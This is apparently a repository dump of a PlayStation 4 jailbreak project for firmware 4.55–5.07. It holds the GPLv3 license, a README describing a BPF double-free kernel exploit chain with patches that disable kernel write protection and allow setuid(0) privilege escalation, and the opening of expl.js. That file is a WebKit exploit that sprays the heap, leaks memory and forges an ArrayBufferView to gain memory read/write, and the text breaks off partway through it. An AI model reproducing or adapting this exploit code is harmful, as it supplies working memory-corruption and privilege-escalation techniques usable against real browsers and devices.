├── LICENSE
├── QuickHEN
│   ├── README.md
│   ├── expl.js
│   ├── fake_installer.bin
│   ├── index.html
│   ├── kdumper.bin
│   ├── kernel.js
│   ├── offline.manifest
│   ├── ps4-hen-vtx-455.bin
│   ├── ps4-hen-vtx-505.bin
│   ├── rop.js
│   ├── syscalls.js
│   ├── unblocker.bin
│   └── userland.js
├── README.md
└── shellcode_ps4_bpf_505_kexploit
    ├── shellcode2js
    │   ├── bin
    │   │   └── shellcode2js.exe
    │   └── src
    │       ├── Makefile
    │       └── main.c
    ├── shellcode_455.bin
    ├── shellcode_455.bin.js
    ├── shellcode_474.bin
    ├── shellcode_474.bin.js
    ├── shellcode_501.bin
    ├── shellcode_501.bin.js
    ├── shellcode_505.bin
    ├── shellcode_505.bin.js
    ├── shellcode_505.c
    └── shellcode_505.i64

/LICENSE:
--------------------------------------------------------------------------------

GNU GENERAL PUBLIC LICENSE
Version 3, 29 June 2007

Copyright (C) 2007 Free Software Foundation, Inc.
Everyone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed.

Preamble

The GNU General Public License is a free, copyleft license for software and other kinds of works.

The licenses for most software and other practical works are designed to take away your freedom to share and change the works. By contrast, the GNU General Public License is intended to guarantee your freedom to share and change all versions of a program--to make sure it remains free software for all its users. We, the Free Software Foundation, use the GNU General Public License for most of our software; it applies also to any other work released this way by its authors. You can apply it to your programs, too.

When we speak of free software, we are referring to freedom, not price. Our General Public Licenses are designed to make sure that you have the freedom to distribute copies of free software (and charge for them if you wish), that you receive source code or can get it if you want it, that you can change the software or use pieces of it in new free programs, and that you know you can do these things.

To protect your rights, we need to prevent others from denying you these rights or asking you to surrender the rights. Therefore, you have certain responsibilities if you distribute copies of the software, or if you modify it: responsibilities to respect the freedom of others.

For example, if you distribute copies of such a program, whether gratis or for a fee, you must pass on to the recipients the same freedoms that you received. You must make sure that they, too, receive or can get the source code. And you must show them these terms so they know their rights.

Developers that use the GNU GPL protect your rights with two steps: (1) assert copyright on the software, and (2) offer you this License giving you legal permission to copy, distribute and/or modify it.

For the developers' and authors' protection, the GPL clearly explains that there is no warranty for this free software. For both users' and authors' sake, the GPL requires that modified versions be marked as changed, so that their problems will not be attributed erroneously to authors of previous versions.

Some devices are designed to deny users access to install or run modified versions of the software inside them, although the manufacturer can do so. This is fundamentally incompatible with the aim of protecting users' freedom to change the software. The systematic pattern of such abuse occurs in the area of products for individuals to use, which is precisely where it is most unacceptable. Therefore, we have designed this version of the GPL to prohibit the practice for those products. If such problems arise substantially in other domains, we stand ready to extend this provision to those domains in future versions of the GPL, as needed to protect the freedom of users.

Finally, every program is threatened constantly by software patents. States should not allow patents to restrict development and use of software on general-purpose computers, but in those that do, we wish to avoid the special danger that patents applied to a free program could make it effectively proprietary. To prevent this, the GPL assures that patents cannot be used to render the program non-free.

The precise terms and conditions for copying, distribution and modification follow.

TERMS AND CONDITIONS

0. Definitions.

"This License" refers to version 3 of the GNU General Public License.

"Copyright" also means copyright-like laws that apply to other kinds of works, such as semiconductor masks.

"The Program" refers to any copyrightable work licensed under this License. Each licensee is addressed as "you". "Licensees" and "recipients" may be individuals or organizations.

To "modify" a work means to copy from or adapt all or part of the work in a fashion requiring copyright permission, other than the making of an exact copy. The resulting work is called a "modified version" of the earlier work or a work "based on" the earlier work.

A "covered work" means either the unmodified Program or a work based on the Program.

To "propagate" a work means to do anything with it that, without permission, would make you directly or secondarily liable for infringement under applicable copyright law, except executing it on a computer or modifying a private copy. Propagation includes copying, distribution (with or without modification), making available to the public, and in some countries other activities as well.

To "convey" a work means any kind of propagation that enables other parties to make or receive copies. Mere interaction with a user through a computer network, with no transfer of a copy, is not conveying.

An interactive user interface displays "Appropriate Legal Notices" to the extent that it includes a convenient and prominently visible feature that (1) displays an appropriate copyright notice, and (2) tells the user that there is no warranty for the work (except to the extent that warranties are provided), that licensees may convey the work under this License, and how to view a copy of this License. If the interface presents a list of user commands or options, such as a menu, a prominent item in the list meets this criterion.

1. Source Code.

The "source code" for a work means the preferred form of the work for making modifications to it. "Object code" means any non-source form of a work.

A "Standard Interface" means an interface that either is an official standard defined by a recognized standards body, or, in the case of interfaces specified for a particular programming language, one that is widely used among developers working in that language.

The "System Libraries" of an executable work include anything, other than the work as a whole, that (a) is included in the normal form of packaging a Major Component, but which is not part of that Major Component, and (b) serves only to enable use of the work with that Major Component, or to implement a Standard Interface for which an implementation is available to the public in source code form. A "Major Component", in this context, means a major essential component (kernel, window system, and so on) of the specific operating system (if any) on which the executable work runs, or a compiler used to produce the work, or an object code interpreter used to run it.

The "Corresponding Source" for a work in object code form means all the source code needed to generate, install, and (for an executable work) run the object code and to modify the work, including scripts to control those activities. However, it does not include the work's System Libraries, or general-purpose tools or generally available free programs which are used unmodified in performing those activities but which are not part of the work. For example, Corresponding Source includes interface definition files associated with source files for the work, and the source code for shared libraries and dynamically linked subprograms that the work is specifically designed to require, such as by intimate data communication or control flow between those subprograms and other parts of the work.

The Corresponding Source need not include anything that users can regenerate automatically from other parts of the Corresponding Source.

The Corresponding Source for a work in source code form is that same work.

2. Basic Permissions.

All rights granted under this License are granted for the term of copyright on the Program, and are irrevocable provided the stated conditions are met. This License explicitly affirms your unlimited permission to run the unmodified Program. The output from running a covered work is covered by this License only if the output, given its content, constitutes a covered work. This License acknowledges your rights of fair use or other equivalent, as provided by copyright law.

You may make, run and propagate covered works that you do not convey, without conditions so long as your license otherwise remains in force. You may convey covered works to others for the sole purpose of having them make modifications exclusively for you, or provide you with facilities for running those works, provided that you comply with the terms of this License in conveying all material for which you do not control copyright. Those thus making or running the covered works for you must do so exclusively on your behalf, under your direction and control, on terms that prohibit them from making any copies of your copyrighted material outside their relationship with you.

Conveying under any other circumstances is permitted solely under the conditions stated below. Sublicensing is not allowed; section 10 makes it unnecessary.

3. Protecting Users' Legal Rights From Anti-Circumvention Law.

No covered work shall be deemed part of an effective technological measure under any applicable law fulfilling obligations under article 11 of the WIPO copyright treaty adopted on 20 December 1996, or similar laws prohibiting or restricting circumvention of such measures.

When you convey a covered work, you waive any legal power to forbid circumvention of technological measures to the extent such circumvention is effected by exercising rights under this License with respect to the covered work, and you disclaim any intention to limit operation or modification of the work as a means of enforcing, against the work's users, your or third parties' legal rights to forbid circumvention of technological measures.

4. Conveying Verbatim Copies.

You may convey verbatim copies of the Program's source code as you receive it, in any medium, provided that you conspicuously and appropriately publish on each copy an appropriate copyright notice; keep intact all notices stating that this License and any non-permissive terms added in accord with section 7 apply to the code; keep intact all notices of the absence of any warranty; and give all recipients a copy of this License along with the Program.

You may charge any price or no price for each copy that you convey, and you may offer support or warranty protection for a fee.

5. Conveying Modified Source Versions.

You may convey a work based on the Program, or the modifications to produce it from the Program, in the form of source code under the terms of section 4, provided that you also meet all of these conditions:

a) The work must carry prominent notices stating that you modified it, and giving a relevant date.

b) The work must carry prominent notices stating that it is released under this License and any conditions added under section 7. This requirement modifies the requirement in section 4 to "keep intact all notices".

c) You must license the entire work, as a whole, under this License to anyone who comes into possession of a copy. This License will therefore apply, along with any applicable section 7 additional terms, to the whole of the work, and all its parts, regardless of how they are packaged. This License gives no permission to license the work in any other way, but it does not invalidate such permission if you have separately received it.

d) If the work has interactive user interfaces, each must display Appropriate Legal Notices; however, if the Program has interactive interfaces that do not display Appropriate Legal Notices, your work need not make them do so.

A compilation of a covered work with other separate and independent works, which are not by their nature extensions of the covered work, and which are not combined with it such as to form a larger program, in or on a volume of a storage or distribution medium, is called an "aggregate" if the compilation and its resulting copyright are not used to limit the access or legal rights of the compilation's users beyond what the individual works permit. Inclusion of a covered work in an aggregate does not cause this License to apply to the other parts of the aggregate.

6. Conveying Non-Source Forms.

You may convey a covered work in object code form under the terms of sections 4 and 5, provided that you also convey the machine-readable Corresponding Source under the terms of this License, in one of these ways:

a) Convey the object code in, or embodied in, a physical product (including a physical distribution medium), accompanied by the Corresponding Source fixed on a durable physical medium customarily used for software interchange.

b) Convey the object code in, or embodied in, a physical product (including a physical distribution medium), accompanied by a written offer, valid for at least three years and valid for as long as you offer spare parts or customer support for that product model, to give anyone who possesses the object code either (1) a copy of the Corresponding Source for all the software in the product that is covered by this License, on a durable physical medium customarily used for software interchange, for a price no more than your reasonable cost of physically performing this conveying of source, or (2) access to copy the Corresponding Source from a network server at no charge.

c) Convey individual copies of the object code with a copy of the written offer to provide the Corresponding Source. This alternative is allowed only occasionally and noncommercially, and only if you received the object code with such an offer, in accord with subsection 6b.

d) Convey the object code by offering access from a designated place (gratis or for a charge), and offer equivalent access to the Corresponding Source in the same way through the same place at no further charge. You need not require recipients to copy the Corresponding Source along with the object code. If the place to copy the object code is a network server, the Corresponding Source may be on a different server (operated by you or a third party) that supports equivalent copying facilities, provided you maintain clear directions next to the object code saying where to find the Corresponding Source. Regardless of what server hosts the Corresponding Source, you remain obligated to ensure that it is available for as long as needed to satisfy these requirements.

e) Convey the object code using peer-to-peer transmission, provided you inform other peers where the object code and Corresponding Source of the work are being offered to the general public at no charge under subsection 6d.

A separable portion of the object code, whose source code is excluded from the Corresponding Source as a System Library, need not be included in conveying the object code work.

A "User Product" is either (1) a "consumer product", which means any tangible personal property which is normally used for personal, family, or household purposes, or (2) anything designed or sold for incorporation into a dwelling. In determining whether a product is a consumer product, doubtful cases shall be resolved in favor of coverage. For a particular product received by a particular user, "normally used" refers to a typical or common use of that class of product, regardless of the status of the particular user or of the way in which the particular user actually uses, or expects or is expected to use, the product. A product is a consumer product regardless of whether the product has substantial commercial, industrial or non-consumer uses, unless such uses represent the only significant mode of use of the product.

"Installation Information" for a User Product means any methods, procedures, authorization keys, or other information required to install and execute modified versions of a covered work in that User Product from a modified version of its Corresponding Source. The information must suffice to ensure that the continued functioning of the modified object code is in no case prevented or interfered with solely because modification has been made.

If you convey an object code work under this section in, or with, or specifically for use in, a User Product, and the conveying occurs as part of a transaction in which the right of possession and use of the User Product is transferred to the recipient in perpetuity or for a fixed term (regardless of how the transaction is characterized), the Corresponding Source conveyed under this section must be accompanied by the Installation Information. But this requirement does not apply if neither you nor any third party retains the ability to install modified object code on the User Product (for example, the work has been installed in ROM).

The requirement to provide Installation Information does not include a requirement to continue to provide support service, warranty, or updates for a work that has been modified or installed by the recipient, or for the User Product in which it has been modified or installed. Access to a network may be denied when the modification itself materially and adversely affects the operation of the network or violates the rules and protocols for communication across the network.

Corresponding Source conveyed, and Installation Information provided, in accord with this section must be in a format that is publicly documented (and with an implementation available to the public in source code form), and must require no special password or key for unpacking, reading or copying.

7. Additional Terms.

"Additional permissions" are terms that supplement the terms of this License by making exceptions from one or more of its conditions. Additional permissions that are applicable to the entire Program shall be treated as though they were included in this License, to the extent that they are valid under applicable law. If additional permissions apply only to part of the Program, that part may be used separately under those permissions, but the entire Program remains governed by this License without regard to the additional permissions.

When you convey a copy of a covered work, you may at your option remove any additional permissions from that copy, or from any part of it. (Additional permissions may be written to require their own removal in certain cases when you modify the work.) You may place additional permissions on material, added by you to a covered work, for which you have or can give appropriate copyright permission.

Notwithstanding any other provision of this License, for material you add to a covered work, you may (if authorized by the copyright holders of that material) supplement the terms of this License with terms:

a) Disclaiming warranty or limiting liability differently from the terms of sections 15 and 16 of this License; or

b) Requiring preservation of specified reasonable legal notices or author attributions in that material or in the Appropriate Legal Notices displayed by works containing it; or

c) Prohibiting misrepresentation of the origin of that material, or requiring that modified versions of such material be marked in reasonable ways as different from the original version; or

d) Limiting the use for publicity purposes of names of licensors or authors of the material; or

e) Declining to grant rights under trademark law for use of some trade names, trademarks, or service marks; or

f) Requiring indemnification of licensors and authors of that material by anyone who conveys the material (or modified versions of it) with contractual assumptions of liability to the recipient, for any liability that these contractual assumptions directly impose on those licensors and authors.

All other non-permissive additional terms are considered "further restrictions" within the meaning of section 10. If the Program as you received it, or any part of it, contains a notice stating that it is governed by this License along with a term that is a further restriction, you may remove that term. If a license document contains a further restriction but permits relicensing or conveying under this License, you may add to a covered work material governed by the terms of that license document, provided that the further restriction does not survive such relicensing or conveying.

If you add terms to a covered work in accord with this section, you must place, in the relevant source files, a statement of the additional terms that apply to those files, or a notice indicating where to find the applicable terms.

Additional terms, permissive or non-permissive, may be stated in the form of a separately written license, or stated as exceptions; the above requirements apply either way.

8. Termination.

You may not propagate or modify a covered work except as expressly provided under this License. Any attempt otherwise to propagate or modify it is void, and will automatically terminate your rights under this License (including any patent licenses granted under the third paragraph of section 11).

However, if you cease all violation of this License, then your license from a particular copyright holder is reinstated (a) provisionally, unless and until the copyright holder explicitly and finally terminates your license, and (b) permanently, if the copyright holder fails to notify you of the violation by some reasonable means prior to 60 days after the cessation.

Moreover, your license from a particular copyright holder is reinstated permanently if the copyright holder notifies you of the violation by some reasonable means, this is the first time you have received notice of violation of this License (for any work) from that copyright holder, and you cure the violation prior to 30 days after your receipt of the notice.

Termination of your rights under this section does not terminate the licenses of parties who have received copies or rights from you under this License. If your rights have been terminated and not permanently reinstated, you do not qualify to receive new licenses for the same material under section 10.

9. Acceptance Not Required for Having Copies.

You are not required to accept this License in order to receive or run a copy of the Program. Ancillary propagation of a covered work occurring solely as a consequence of using peer-to-peer transmission to receive a copy likewise does not require acceptance. However, nothing other than this License grants you permission to propagate or modify any covered work. These actions infringe copyright if you do not accept this License. Therefore, by modifying or propagating a covered work, you indicate your acceptance of this License to do so.

10. Automatic Licensing of Downstream Recipients.

Each time you convey a covered work, the recipient automatically receives a license from the original licensors, to run, modify and propagate that work, subject to this License. You are not responsible for enforcing compliance by third parties with this License.

An "entity transaction" is a transaction transferring control of an organization, or substantially all assets of one, or subdividing an organization, or merging organizations. If propagation of a covered work results from an entity transaction, each party to that transaction who receives a copy of the work also receives whatever licenses to the work the party's predecessor in interest had or could give under the previous paragraph, plus a right to possession of the Corresponding Source of the work from the predecessor in interest, if the predecessor has it or can get it with reasonable efforts.

You may not impose any further restrictions on the exercise of the rights granted or affirmed under this License. For example, you may not impose a license fee, royalty, or other charge for exercise of rights granted under this License, and you may not initiate litigation (including a cross-claim or counterclaim in a lawsuit) alleging that any patent claim is infringed by making, using, selling, offering for sale, or importing the Program or any portion of it.

11. Patents.

A "contributor" is a copyright holder who authorizes use under this License of the Program or a work on which the Program is based. The work thus licensed is called the contributor's "contributor version".

A contributor's "essential patent claims" are all patent claims owned or controlled by the contributor, whether already acquired or hereafter acquired, that would be infringed by some manner, permitted by this License, of making, using, or selling its contributor version, but do not include claims that would be infringed only as a consequence of further modification of the contributor version. For purposes of this definition, "control" includes the right to grant patent sublicenses in a manner consistent with the requirements of this License.

Each contributor grants you a non-exclusive, worldwide, royalty-free patent license under the contributor's essential patent claims, to make, use, sell, offer for sale, import and otherwise run, modify and propagate the contents of its contributor version.

In the following three paragraphs, a "patent license" is any express agreement or commitment, however denominated, not to enforce a patent (such as an express permission to practice a patent or covenant not to sue for patent infringement). To "grant" such a patent license to a party means to make such an agreement or commitment not to enforce a patent against the party.

If you convey a covered work, knowingly relying on a patent license, and the Corresponding Source of the work is not available for anyone to copy, free of charge and under the terms of this License, through a publicly available network server or other readily accessible means, then you must either (1) cause the Corresponding Source to be so available, or (2) arrange to deprive yourself of the benefit of the patent license for this particular work, or (3) arrange, in a manner consistent with the requirements of this License, to extend the patent license to downstream recipients. "Knowingly relying" means you have actual knowledge that, but for the patent license, your conveying the covered work in a country, or your recipient's use of the covered work in a country, would infringe one or more identifiable patents in that country that you have reason to believe are valid.

If, pursuant to or in connection with a single transaction or arrangement, you convey, or propagate by procuring conveyance of, a covered work, and grant a patent license to some of the parties receiving the covered work authorizing them to use, propagate, modify or convey a specific copy of the covered work, then the patent license you grant is automatically extended to all recipients of the covered work and works based on it.

A patent license is "discriminatory" if it does not include within the scope of its coverage, prohibits the exercise of, or is conditioned on the non-exercise of one or more of the rights that are specifically granted under this License. You may not convey a covered work if you are a party to an arrangement with a third party that is in the business of distributing software, under which you make payment to the third party based on the extent of your activity of conveying the work, and under which the third party grants, to any of the parties who would receive the covered work from you, a discriminatory patent license (a) in connection with copies of the covered work conveyed by you (or copies made from those copies), or (b) primarily for and in connection with specific products or compilations that contain the covered work, unless you entered into that arrangement, or that patent license was granted, prior to 28 March 2007.

Nothing in this License shall be construed as excluding or limiting any implied license or other defenses to infringement that may otherwise be available to you under applicable patent law.

12. No Surrender of Others' Freedom.

If conditions are imposed on you (whether by court order, agreement or otherwise) that contradict the conditions of this License, they do not excuse you from the conditions of this License. If you cannot convey a covered work so as to satisfy simultaneously your obligations under this License and any other pertinent obligations, then as a consequence you may not convey it at all. For example, if you agree to terms that obligate you to collect a royalty for further conveying from those to whom you convey the Program, the only way you could satisfy both those terms and this License would be to refrain entirely from conveying the Program.

13. Use with the GNU Affero General Public License.

Notwithstanding any other provision of this License, you have permission to link or combine any covered work with a work licensed under version 3 of the GNU Affero General Public License into a single combined work, and to convey the resulting work. The terms of this License will continue to apply to the part which is the covered work, but the special requirements of the GNU Affero General Public License, section 13, concerning interaction through a network will apply to the combination as such.

14. Revised Versions of this License.

The Free Software Foundation may publish revised and/or new versions of the GNU General Public License from time to time. Such new versions will be similar in spirit to the present version, but may differ in detail to address new problems or concerns.

Each version is given a distinguishing version number. If the Program specifies that a certain numbered version of the GNU General Public License "or any later version" applies to it, you have the option of following the terms and conditions either of that numbered version or of any later version published by the Free Software Foundation. If the Program does not specify a version number of the GNU General Public License, you may choose any version ever published by the Free Software Foundation.

If the Program specifies that a proxy can decide which future versions of the GNU General Public License can be used, that proxy's public statement of acceptance of a version permanently authorizes you to choose that version for the Program.

Later license versions may give you additional or different permissions. However, no additional obligations are imposed on any author or copyright holder as a result of your choosing to follow a later version.

15. Disclaimer of Warranty.

THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION.

16. Limitation of Liability.

IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.

17. Interpretation of Sections 15 and 16.

If the disclaimer of warranty and limitation of liability provided above cannot be given local legal effect according to their terms, reviewing courts shall apply local law that most closely approximates an absolute waiver of all civil liability in connection with the Program, unless a warranty or assumption of liability accompanies a copy of the Program in return for a fee.

END OF TERMS AND CONDITIONS

How to Apply These Terms to Your New Programs

If you develop a new program, and you want it to be of the greatest possible use to the public, the best way to achieve this is to make it free software which everyone can redistribute and change under these terms.

To do so, attach the following notices to the program. It is safest to attach them to the start of each source file to most effectively state the exclusion of warranty; and each file should have at least the "copyright" line and a pointer to where the full notice is found.

Copyright (C)

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program. If not, see .

Also add information on how to contact you by electronic and paper mail.
651 | 
652 |   If the program does terminal interaction, make it output a short
653 | notice like this when it starts in an interactive mode:
654 | 
655 |     Copyright (C)
656 |     This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
657 |     This is free software, and you are welcome to redistribute it
658 |     under certain conditions; type `show c' for details.
659 | 
660 | The hypothetical commands `show w' and `show c' should show the appropriate
661 | parts of the General Public License. Of course, your program's commands
662 | might be different; for a GUI interface, you would use an "about box".
663 | 
664 |   You should also get your employer (if you work as a programmer) or school,
665 | if any, to sign a "copyright disclaimer" for the program, if necessary.
666 | For more information on this, and how to apply and follow the GNU GPL, see
667 | .
668 | 
669 |   The GNU General Public License does not permit incorporating your program
670 | into proprietary programs. If your program is a subroutine library, you
671 | may consider it more useful to permit linking proprietary applications with
672 | the library. If this is what you want to do, use the GNU Lesser General
673 | Public License instead of this License. But first, please read
674 | .
675 | 


--------------------------------------------------------------------------------
/QuickHEN/README.md:
--------------------------------------------------------------------------------
 1 | # PS4 4.55-5.07 Kernel Exploit
 2 | ---
 3 | ## Summary
 4 | In this project you will find a full implementation of the second "bpf" kernel exploit for the PlayStation 4 on <=5.07.
 5 | It will allow you to run arbitrary code in kernel mode, which in turn allows jailbreaking and kernel-level modifications to the system.
 6 | 
 7 | ## Exploits
 8 | - webkit:
 9 | - kernel: BPF Double Free exploit by qwertyoruiopz
10 | 
11 | ## Patches included
12 | The following patches are applied in the kernel ROP chain:
13 | 1) Disable kernel write protection
14 | 2) Allow RWX (read-write-execute) memory mapping
15 | 3) Syscall instruction allowed anywhere
16 | 4) Dynamic Resolving (`sys_dynlib_dlsym`) allowed from any process
17 | 5) Custom system call #11 (`kexec()`) to execute arbitrary code in kernel mode
18 | 6) Allow unprivileged users to call `setuid(0)` successfully. Works as a status check, and doubles as a privilege escalation.
19 | 
20 | ## Payloads included
21 | 1) PS4HEN (Homebrew ENabler): default
22 | 2) Mira: removed
23 | 3) Kdumper: optional
24 | 4) Update unblocker: optional
25 | 
26 | ## Notes
27 | 
28 | 
29 | ## Contributors
30 | Massive credits to the following:
31 | 
32 | - [qwertyoruiopz](https://twitter.com/qwertyoruiopz)
33 | - [Cryptogenic](https://twitter.com/SpecterDev) aka Specter
34 | - [Flatz](https://twitter.com/flat_z)
35 | - [CelesteBlue-dev](https://twitter.com/CelesteBlue123)
36 | - [Vortex](https://github.com/xvortex)
37 | - to be continued
38 | - [OpenOrbis Team](https://github.com/OpenOrbis/)
39 | - Anonymous
40 | 


--------------------------------------------------------------------------------
/QuickHEN/expl.js:
--------------------------------------------------------------------------------
  1 | function makeid() {
  2 |     var text = "";
  3 |     var possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
  4 | 
  5 |     for (var i = 0; i < 8; i++)
  6 |         text += possible.charAt(Math.floor(Math.random() * possible.length));
  7 | 
  8 |     return text;
  9 | };
 10 | 
 11 | var instancespr = [];
 12 | 
 13 | for (var i = 0; i < 4096; i++) {
 14 |     instancespr[i] = new Uint32Array(1);
 15 |     instancespr[i][makeid()] = 50057; /* spray 4-field Object InstanceIDs */
 16 | }
 17 | 
 18 | var _dview;
 19 | 
 20 | function u2d(low, hi) {
 21 |     if (!_dview) _dview = new DataView(new ArrayBuffer(16));
 22 |     _dview.setUint32(0, hi);
 23 |     _dview.setUint32(4, low);
 24 |     return _dview.getFloat64(0);
 25 | }
 26 | var dgc = function () {
 27 |     for (var i = 0; i < 0x100; i++) {
 28 |         new ArrayBuffer(0x100000);
 29 |     }
 30 | }
 31 | 
 32 | function int64(low, hi) {
 33 |     this.low = (low >>> 0);
 34 |     this.hi = (hi >>> 0);
 35 | 
 36 |     this.add32inplace = function (val) {
 37 |         var new_lo = (((this.low >>> 0) + val) & 0xFFFFFFFF) >>> 0;
 38 |         var new_hi = (this.hi >>> 0);
 39 | 
 40 |         if (new_lo < this.low) {
 41 |             new_hi++;
 42 |         }
 43 | 
 44 |         this.hi = new_hi;
 45 |         this.low = new_lo;
 46 |     }
 47 | 
 48 |     this.add32 = function (val) {
 49 |         var new_lo = (((this.low >>> 0) + val) & 0xFFFFFFFF) >>> 0;
 50 |         var new_hi = (this.hi >>> 0);
 51 | 
 52 |         if (new_lo < this.low) {
 53 |             new_hi++;
 54 |         }
 55 | 
 56 |         return new int64(new_lo, new_hi);
 57 |     }
 58 | 
 59 |     this.sub32 = function (val) {
 60 |         var new_lo = (((this.low >>> 0) - val) & 0xFFFFFFFF) >>> 0;
 61 |         var new_hi = (this.hi >>> 0);
 62 | 
 63 |         if (new_lo > (this.low) & 0xFFFFFFFF) {
 64 |             new_hi--;
 65 |         }
 66 | 
 67 |         return new int64(new_lo, new_hi);
 68 |     }
 69 | 
 70 |     this.sub32inplace = function (val) {
 71 |         var new_lo = (((this.low >>> 0) - val) & 0xFFFFFFFF) >>> 0;
 72 |         var new_hi = (this.hi >>> 0);
 73 | 
 74 |         if (new_lo > (this.low) & 0xFFFFFFFF) {
 75 |             new_hi--;
 76 |         }
 77 | 
 78 |         this.hi = new_hi;
 79 |         this.low = new_lo;
 80 |     }
 81 | 
 82 |     this.and32 = function (val) {
 83 |         var new_lo = this.low & val;
 84 |         var new_hi = this.hi;
 85 |         return new int64(new_lo, new_hi);
 86 |     }
 87 | 
 88 |     this.and64 = function (vallo, valhi) {
 89 |         var new_lo = this.low & vallo;
 90 |         var new_hi = this.hi & valhi;
 91 |         return new int64(new_lo, new_hi);
 92 |     }
 93 | 
 94 |     this.toString = function (val) {
 95 |         val = 16;
 96 |         var lo_str = (this.low >>> 0).toString(val);
 97 |         var hi_str = (this.hi >>> 0).toString(val);
 98 | 
 99 |         if (this.hi == 0)
100 |             return lo_str;
101 |         else
102 |             lo_str = zeroFill(lo_str, 8)
103 | 
104 |         return hi_str + lo_str;
105 |     }
106 | 
107 |     this.toPacked = function () {
108 |         return {
109 |             hi: this.hi,
110 |             low: this.low
111 |         };
112 |     }
113 | 
114 |     this.setPacked = function (pck) {
115 |         this.hi = pck.hi;
116 |         this.low = pck.low;
117 |         return this;
118 |     }
119 | 
120 |     return this;
121 | }
122 | 
123 | function zeroFill(number, width) {
124 |     width -= number.toString().length;
125 | 
126 |     if (width > 0) {
127 |         return new Array(width + (/\./.test(number) ? 2 : 1)).join('0') + number;
128 |     }
129 | 
130 |     return number + ""; // always return a string
131 | }
132 | 
133 | var nogc = [];
134 | 
135 | var fail = function () {
136 |     alert.apply(null, arguments);
137 |     throw "fail";
138 | }
139 | 
140 | // Target JSObject for overlap
141 | var tgt = {
142 |     a: 0,
143 |     b: 0,
144 |     c: 0,
145 |     d: 0
146 | }
147 | 
148 | var y = new ImageData(1, 0x4000)
149 | postMessage("", "*", [y.data.buffer]);
150 | 
151 | // Spray properties to ensure object is fastmalloc()'d and can be found easily later
152 | var props = {};
153 | 
154 | for (var i = 0;
155 |     (i < (0x4000 / 2));) {
156 |     props[i++] = {
157 |         value: 0x42424242
158 |     };
159 |     props[i++] = {
160 |         value: tgt
161 |     };
162 | }
163 | 
164 | var foundLeak = undefined;
165 | var foundIndex = 0;
166 | var maxCount = 0x100;
167 | 
168 | while (foundLeak == undefined && maxCount > 0) {
169 |     maxCount--;
170 | 
171 |     history.pushState(y, "");
172 | 
173 |     Object.defineProperties({}, props);
174 | 
175 |     var leak = new Uint32Array(history.state.data.buffer);
176 | 
177 |     for (var i = 0; i < leak.length - 6; i++) {
178 |         if (
179 |             leak[i] == 0x42424242 &&
180 |             leak[i + 0x1] == 0xFFFF0000 &&
181 |             leak[i + 0x2] == 0x00000000 &&
182 |             leak[i + 0x3] == 0x00000000 &&
183 |             leak[i + 0x4] == 0x00000000 &&
184 |             leak[i + 0x5] == 0x00000000 &&
185 |             leak[i + 0x6] == 0x0000000E &&
186 |             leak[i + 0x7] == 0x00000000 &&
187 |             leak[i + 0xA] == 0x00000000 &&
188 |             leak[i + 0xB] == 0x00000000 &&
189 |             leak[i + 0xC] == 0x00000000 &&
190 |             leak[i + 0xD] == 0x00000000 &&
191 |             leak[i + 0xE] == 0x0000000E &&
192 |             leak[i + 0xF] == 0x00000000
193 |         ) {
194 |             foundIndex = i;
195 |             foundLeak = leak;
196 |             break;
197 |         }
198 |     }
199 | }
200 | 
201 | if (!foundLeak) {
202 |     failed = true
203 |     fail("Failed to find leak!")
204 | }
205 | 
206 | var firstLeak = Array.prototype.slice.call(foundLeak, foundIndex, foundIndex + 0x40);
207 | var leakJSVal = new int64(firstLeak[8], firstLeak[9]);
208 | 
209 | Array.prototype.__defineGetter__(100, () => 1);
210 | 
211 | var f = document.body.appendChild(document.createElement('iframe'));
212 | var a = new f.contentWindow.Array(13.37, 13.37);
213 | var b = new f.contentWindow.Array(u2d(leakJSVal.low + 0x10, leakJSVal.hi), 13.37);
214 | 
215 | var master = new Uint32Array(0x1000);
216 | var slave = new Uint32Array(0x1000);
217 | var leakval_u32 = new Uint32Array(0x1000);
218 | var leakval_helper = [slave, 2, 3, 4, 5, 6, 7, 8, 9, 10];
219 | 
220 | // Create fake ArrayBufferView
221 | tgt.a = u2d(2048, 0x1602300);
222 | tgt.b = 0;
223 | tgt.c = leakval_helper;
224 | tgt.d = 0x1337;
225 | 
226 | var c = Array.prototype.concat.call(a, b);
227 | document.body.removeChild(f);
228 | var hax = c[0];
229 | c[0] = 0;
230 | 
231 | tgt.c = c;
232 | 
233 | hax[2] = 0;
234 | hax[3] = 0;
235 | 
236 | Object.defineProperty(Array.prototype, 100, {
237 |     get: undefined
238 | });
239 | 
240 | tgt.c = leakval_helper;
241 | var butterfly = new int64(hax[2], hax[3]);
